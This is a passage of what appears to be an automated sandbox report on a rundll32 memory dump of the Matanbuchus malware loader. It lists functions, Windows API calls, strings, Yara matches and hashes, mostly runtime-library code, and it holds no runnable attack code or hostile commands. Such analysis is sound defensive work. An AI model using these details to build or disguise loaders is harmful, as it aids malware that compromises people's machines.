                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                          • String ID: 0x%x$?
                          • API String ID: 3386633596-4137330559
                          • Opcode ID: 60b80524ba72b0d9739fda438ea73451c9c87c9b288cbc19cc42c9fece31226f
                          • Instruction ID: 32a46db83de215922cf5b3f92096694d74191df35d7f4ade5da248fbdd08ff09
                          • Opcode Fuzzy Hash: 60b80524ba72b0d9739fda438ea73451c9c87c9b288cbc19cc42c9fece31226f
                          • Instruction Fuzzy Hash: 32810EB2D00218BFEF119BA5CE85EEEB7BDEF08245F140069E905E6154EA3DDE508B74
                          Function 7FADD253 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,7FADCBBF), ref: 7FADD26C
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer
                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                          • API String ID: 3527080286-3064271455
                          • Opcode ID: b16154c8e0bcc9a232bb4d821c7b05b02245854f5ace9ec23e5b534293c8b4a9
                          • Instruction ID: b6cf39d8614f1c696da55a4d8afd729f0d31d9c20279c646c163ee30b4548dd6
                          • Opcode Fuzzy Hash: b16154c8e0bcc9a232bb4d821c7b05b02245854f5ace9ec23e5b534293c8b4a9
                          • Instruction Fuzzy Hash: 715167B990460ACBCF019F6AE8485EDBF78FF4D310F514195E492AB25CCB7CA622CB54
                          Function 7FAC0E11 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 7FAC0F30
                          • ___TypeMatch.LIBVCRUNTIME ref: 7FAC103E
                          • _UnwindNestedFrames.LIBCMT ref: 7FAC1190
                          • CallUnexpected.LIBVCRUNTIME ref: 7FAC11AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 2751267872-393685449
                          • Opcode ID: 8ce92c2236473f36e6f9ee57da6fe3feb031fa2a7cad4bf3170b2ddbe94c7926
                          • Instruction ID: ea96542033967c363bf5c811161162a3ea7bd01434633237ee1f1e30d16bccf3
                          • Opcode Fuzzy Hash: 8ce92c2236473f36e6f9ee57da6fe3feb031fa2a7cad4bf3170b2ddbe94c7926
                          • Instruction Fuzzy Hash: 37B15E75A00309DFCF06CFA4C98099EB7B6FF08720F118569E816AB219D73DEA51CB91
                          Function 6CC78480 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6CC784B7
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6CC784BF
                          • _ValidateLocalCookies.LIBCMT ref: 6CC78548
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6CC78573
                          • _ValidateLocalCookies.LIBCMT ref: 6CC785C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398238814.000000006CC51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CC50000, based on PE: true
                          • Associated: 00000005.00000002.3398193086.000000006CC50000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000005.00000002.3398328752.000000006CC83000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000005.00000002.3398388420.000000006CC91000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000005.00000002.3398570094.000000006D0F9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000005.00000002.3398622094.000000006D0FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_6cc50000_rundll32.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 1170836740-3733052814
                          • Opcode ID: f1c352e5cf00f87b656aeada9664054c4056c662b92bdc2c6e5df2a5884829fd
                          • Instruction ID: 7bf1b60ee428c11b7d7ca26777f0b1d7c8fb92b9989f59cab5eb6a6dea422a97
                          • Opcode Fuzzy Hash: f1c352e5cf00f87b656aeada9664054c4056c662b92bdc2c6e5df2a5884829fd
                          • Instruction Fuzzy Hash: 51516B34A01204EFDF60CF69C844E9E7BB5FF45328F14819AD9246BB91E731DA15CBA1
                          Function 7FA866F0 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 244COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: S$lqmqxj3IPM1//0.$w$}
                          • API String ID: 0-71832097
                          • Opcode ID: 957c71df0185b46cbccc1a5871f2d2e30d694ca34853203e16461f4a9d9e6817
                          • Instruction ID: 8217ea8c3c02f2753579182d3390d24a7493a1d6f6a40c79854a1064fe2b3159
                          • Opcode Fuzzy Hash: 957c71df0185b46cbccc1a5871f2d2e30d694ca34853203e16461f4a9d9e6817
                          • Instruction Fuzzy Hash: C7B14574D04288DFEB02CFA8C944BDDBBB1AF49304F104159E949BB385D7B96A45CB61
                          Function 7FAC0840 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 7FAC0877
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 7FAC087F
                          • _ValidateLocalCookies.LIBCMT ref: 7FAC0908
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 7FAC0933
                          • _ValidateLocalCookies.LIBCMT ref: 7FAC0988
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: aaa3c111af9c546077567ea1fd63385574956772529a4b744ef81b55f11598ef
                          • Instruction ID: 0a90bde40bf97e18da8124e2c2d1139825d6ea48fb07ef3a05c300865574768d
                          • Opcode Fuzzy Hash: aaa3c111af9c546077567ea1fd63385574956772529a4b744ef81b55f11598ef
                          • Instruction Fuzzy Hash: 31418238A003099BCF00DF69C980B9EBBB5EF49324F14C165E8169B369D739EA15CB91
                          Function 7FAB1380 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                          Download Yara Rule
                          APIs
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB13FF
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB1419
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB1433
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB144D
                          Strings
                          • false, xrefs: 7FAB146E
                          • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7FAB1469
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::bad_exception::bad_exception
                          • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                          • API String ID: 2160870905-4036550669
                          • Opcode ID: b5a04ac64e25cc72c6dc34de74172324e0ff50c3e19b06081c2223187ce40b1b
                          • Instruction ID: baf51acb1cbff99879fc6e986e726c6cbdbea36e5e558664dfcd9844a34fdcb3
                          • Opcode Fuzzy Hash: b5a04ac64e25cc72c6dc34de74172324e0ff50c3e19b06081c2223187ce40b1b
                          • Instruction Fuzzy Hash: AF21A0B1A00308ABCB08CFA4C990DDE77BAFB94300F10859CE9416B258DF39FA45CB21
                          Function 7FAB1260 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                          Download Yara Rule
                          APIs
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB12DF
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB12F9
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB1313
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB132D
                          Strings
                          • false, xrefs: 7FAB134E
                          • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7FAB1349
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::bad_exception::bad_exception
                          • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                          • API String ID: 2160870905-4036550669
                          • Opcode ID: c66b4379b93da53f70ac07d4ab26627b15eb3a5dbc4173d195878003a1647678
                          • Instruction ID: 2f58aef7b6e09ca5cec6bd28a5b61823218ab222517518daf00bf15a2bba6184
                          • Opcode Fuzzy Hash: c66b4379b93da53f70ac07d4ab26627b15eb3a5dbc4173d195878003a1647678
                          • Instruction Fuzzy Hash: 57217E71A00308ABCB04DFA4D990DDE73BABB95300F14859CE9516B658EF39BA55CB21
                          Function 7FAD0C9C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,7FAD0DA9,7FACDD78,0000000C,7FAE2040,00000000,00000000,?,7FAD0FF6,00000021,FlsSetValue,7FAEA8C0,7FAEA8C8,7FAE2040), ref: 7FAD0D5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: 693dd47df731cd375f6a439fd28b61f4ea29e27508a46c9a9b6d6f3865344055
                          • Instruction ID: 1a6afdff6504bf7c31d0b789cbc18d69759e9cb79a24b2d223e47d7c8bb1c648
                          • Opcode Fuzzy Hash: 693dd47df731cd375f6a439fd28b61f4ea29e27508a46c9a9b6d6f3865344055
                          • Instruction Fuzzy Hash: BC21923AA01311ABD7129675DC41B8A37B8EF45770F248131F956AB28CD638F911C7D0
                          Function 7FABD13C Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 7FABD185
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 7FABD1F0
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7FABD20D
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 7FABD24C
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7FABD2AB
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 7FABD2CE
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiStringWide
                          • String ID:
                          • API String ID: 2829165498-0
                          • Opcode ID: 18156609b83d1df8ec614d359643d3ac70aa51c2ad8f332116d565f167e9221d
                          • Instruction ID: f1c7209059c2324c04e650fc9621c296bde35b393db49261e7b7730a12f1c29f
                          • Opcode Fuzzy Hash: 18156609b83d1df8ec614d359643d3ac70aa51c2ad8f332116d565f167e9221d
                          • Instruction Fuzzy Hash: 7951AB7660034AAFEB119EA1DD45FEB3BBDEF48650F104128F906A6198D73CE811CB90
                          Function 7FAC0AA3 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000001,?,7FAC09C2,7FABD53B,7FABDA30,?,7FABDC68,?,00000001,?,?,00000001,?,7FAF2608,0000000C,7FABDD61), ref: 7FAC0AB1
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 7FAC0ABF
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 7FAC0AD8
                          • SetLastError.KERNEL32(00000000,7FABDC68,?,00000001,?,?,00000001,?,7FAF2608,0000000C,7FABDD61,?,00000001,?), ref: 7FAC0B2A
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: dcf5ebc6a488a05e9d0a48b570056143b81c36d2f73dc045066281fb7b0c3655
                          • Instruction ID: 0358c727ca9c2aa48b271cd4e32094215aff994204699c9a11b9e35250891a56
                          • Opcode Fuzzy Hash: dcf5ebc6a488a05e9d0a48b570056143b81c36d2f73dc045066281fb7b0c3655
                          • Instruction Fuzzy Hash: F801283B31C3159ED70517B6AD84A4A2BD4EF056747344339F521DA0E8EF19DC11D284
                          Function 7FACBEB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7FACBED5
                          • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7FACBEE7
                          • swprintf.LIBCMT ref: 7FACBF08
                          • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7FACBF45
                          Strings
                          • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7FACBEFD
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ConsoleFileHandleTypeWriteswprintf
                          • String ID: Assertion failed: %Ts, file %Ts, line %d
                          • API String ID: 2943507729-1719349581
                          • Opcode ID: be4af9f9eee83afc8a51db778a3a303c726a8aa27ad95dc8f0ea782ab8871603
                          • Instruction ID: 5095bdddfde37af7afaf692e834bd623d9f04ea1968c165249e87022dd37b454
                          • Opcode Fuzzy Hash: be4af9f9eee83afc8a51db778a3a303c726a8aa27ad95dc8f0ea782ab8871603
                          • Instruction Fuzzy Hash: 0911387A5002186BCF10DF29CD44ADE73BCEF44260F504598EA1E97248EA34EA06CFA0
                          Function 7FACD45A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,177197C3,7FAE2040,?,00000000,7FAE0873,000000FF,?,7FACD3EA,7D83FC4D,?,7FACD3BE,7FAE2040), ref: 7FACD48F
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7FACD4A1
                          • FreeLibrary.KERNEL32(00000000,?,00000000,7FAE0873,000000FF,?,7FACD3EA,7D83FC4D,?,7FACD3BE,7FAE2040), ref: 7FACD4C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: b7918a829aac2d719edc4bc62257db862b3dcffdeb13ab29d404a0dccbb8a3c9
                          • Instruction ID: 96591b0f73c853b18f0f3f6a3d9c406ee779dc728c4c63a245992931b4a52703
                          • Opcode Fuzzy Hash: b7918a829aac2d719edc4bc62257db862b3dcffdeb13ab29d404a0dccbb8a3c9
                          • Instruction Fuzzy Hash: 5C01A73A904615EFDB019B51CC06FEE7BBCFB08721F044225EC23A2294DB7CA610CB90
                          Function 7FA75BE0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7FA75C07
                          • int.LIBCPMTD ref: 7FA75C20
                            • Part of subcall function 7FA7AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7FA7AD26
                            • Part of subcall function 7FA7AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7FA7AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7FA75C67
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7FA75CFB
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          • Opcode ID: c2a368add31695fdc70bfd6f3a78850ffbe01f0e08d04377490d003872aeffb9
                          • Instruction ID: 485f74f6406186cadd2d00e815d4af45a2df1149a28c7bbdf5198fbb3902301b
                          • Opcode Fuzzy Hash: c2a368add31695fdc70bfd6f3a78850ffbe01f0e08d04377490d003872aeffb9
                          • Instruction Fuzzy Hash: BE41B6B5D00609DFCB04CF98D990BEEBBB5FF48310F204229E815A7394DB786A41CBA1
                          Function 7FA75AA0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7FA75AC7
                          • int.LIBCPMTD ref: 7FA75AE0
                            • Part of subcall function 7FA7AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7FA7AD26
                            • Part of subcall function 7FA7AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7FA7AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7FA75B27
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7FA75BBB
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          • Opcode ID: 76d3c1c3e66e60cb8f66ab233b204ab69a5b5f07503f4d9159fec793ac2bb12c
                          • Instruction ID: 61a94ca453ffdc4534e138265ff731351918c05b7800c179d81906a24a2570fd
                          • Opcode Fuzzy Hash: 76d3c1c3e66e60cb8f66ab233b204ab69a5b5f07503f4d9159fec793ac2bb12c
                          • Instruction Fuzzy Hash: D34198B4D00619DFCB05CF94D990AEEBBB5FF48310F204659E815A7394DB38AA45CBA1
                          Function 7FA75960 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7FA75987
                          • int.LIBCPMTD ref: 7FA759A0
                            • Part of subcall function 7FA7AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7FA7AD26
                            • Part of subcall function 7FA7AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7FA7AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7FA759E7
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7FA75A7B
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          • Opcode ID: 117030fa30a3fcc9c4f7d309364c085a250fc6c71a1cf4406d82870e5dc127f2
                          • Instruction ID: 66d47ce1da63f6ecafdcd6f4d22cfacb26cd6fa7a7d8d374e28ddf0fd17e9187
                          • Opcode Fuzzy Hash: 117030fa30a3fcc9c4f7d309364c085a250fc6c71a1cf4406d82870e5dc127f2
                          • Instruction Fuzzy Hash: 0541B8B5D00609DFCB04CF94D990AEEBBB5FF48310F208229E815A7394DB386A45CFA1
                          Function 7FABCA04 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 7FABCA0B
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7FABCA16
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7FABCA84
                            • Part of subcall function 7FABCB67: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7FABCB7F
                          • std::locale::_Setgloballocale.LIBCPMT ref: 7FABCA31
                          • _Yarn.LIBCPMT ref: 7FABCA47
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                          • String ID:
                          • API String ID: 1088826258-0
                          • Opcode ID: 6a11ccbcb62a8b1aa281ece54735003f4e3706d6a8608c644361e73127058e88
                          • Instruction ID: c3e7b5d87a148cae3101b6d5d22033cf25e5df344066845a17d8d9873f933232
                          • Opcode Fuzzy Hash: 6a11ccbcb62a8b1aa281ece54735003f4e3706d6a8608c644361e73127058e88
                          • Instruction Fuzzy Hash: FE017579A003119BC706DB21D554D7D7B79FF94660B24400DD81257398CF3CAA52CBD5
                          Function 7FABC01A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 7FABC055
                          • CloseHandle.KERNEL32(?), ref: 7FABC0FF
                          • CloseHandle.KERNEL32(00000000), ref: 7FABC109
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateProcess
                          • String ID: ?
                          • API String ID: 2922976086-1684325040
                          • Opcode ID: 08d2d17dfa09d93ce1da23c4097437370361046b70d5c4297445237405be054a
                          • Instruction ID: 9421de483e90af778d557a795b3a4a37b251947900231c29caaca4e379b6f3c0
                          • Opcode Fuzzy Hash: 08d2d17dfa09d93ce1da23c4097437370361046b70d5c4297445237405be054a
                          • Instruction Fuzzy Hash: A9218071900259BBDF218AA6DD09EEF7BBDEF88700F10406DF915B1064EB3D9A54CA60
                          Function 7FAC1BF2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,7FAC1BA3,00000000,?,00000001,?,?,?,7FAC1C92,00000001,FlsFree,7FAE7E5C,FlsFree), ref: 7FAC1BFF
                          • GetLastError.KERNEL32(?,7FAC1BA3,00000000,?,00000001,?,?,?,7FAC1C92,00000001,FlsFree,7FAE7E5C,FlsFree,00000000,?,7FAC0BAF), ref: 7FAC1C09
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 7FAC1C31
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID: api-ms-
                          • API String ID: 3177248105-2084034818
                          • Opcode ID: 561dfb23e5ea9fdc5c7246a17bc57cf2609012b737ff0195a842d668445239a4
                          • Instruction ID: 1e3bb0e455294433d33dc3a7b598eb9d4cd4328ed49170145c18a3ebe4b20274
                          • Opcode Fuzzy Hash: 561dfb23e5ea9fdc5c7246a17bc57cf2609012b737ff0195a842d668445239a4
                          • Instruction Fuzzy Hash: 51E01235348308B7EB111F61DD06B893B69AB10764F644430FE4DA80D4D76EE521D684
                          Function 7FABC590 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7FABC377,?,?,?,7FABBBCC,?,0000000F,?,00000000,00000208), ref: 7FABC5A6
                          • GetProcAddress.KERNEL32(00000000), ref: 7FABC5AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: RtlRandomEx$ntdll.dll
                          • API String ID: 1646373207-4284430886
                          • Opcode ID: 10917da521ae20bc6f37d8c8aeac0d09074b42fbf2c0db30ea038dcfbb14ccec
                          • Instruction ID: 1497013ea7ed86f5717cd26aa1e4581fe92dd4a4f6c3089af473dc745e8eb54e
                          • Opcode Fuzzy Hash: 10917da521ae20bc6f37d8c8aeac0d09074b42fbf2c0db30ea038dcfbb14ccec
                          • Instruction Fuzzy Hash: 24D05E7A2282049B86006FBAC845E853BACA6086213141020FC0489245D729E6218B60
                          Function 7FAD83F1 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetConsoleOutputCP.KERNEL32(177197C3,?,00000000,?), ref: 7FAD8454
                            • Part of subcall function 7FAD439D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,7FAD4226,?,00000000,-00000008), ref: 7FAD4449
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 7FAD86AF
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 7FAD86F7
                          • GetLastError.KERNEL32 ref: 7FAD879A
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: b447b9cfa3812d1653f88dac241016c23334cb1f9b9a1a044cf0486e69a26d98
                          • Instruction ID: 0fe9ed2ffc18e182065cb8bbfaae5da8262eef42891c3e871d8e74a3662679df
                          • Opcode Fuzzy Hash: b447b9cfa3812d1653f88dac241016c23334cb1f9b9a1a044cf0486e69a26d98
                          • Instruction Fuzzy Hash: 8BD16DB9D002589FCF01CFA9C980AEDBBB9FF49310F14456AE856EB359D734A942CB50
                          Function 7FAC0BBA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
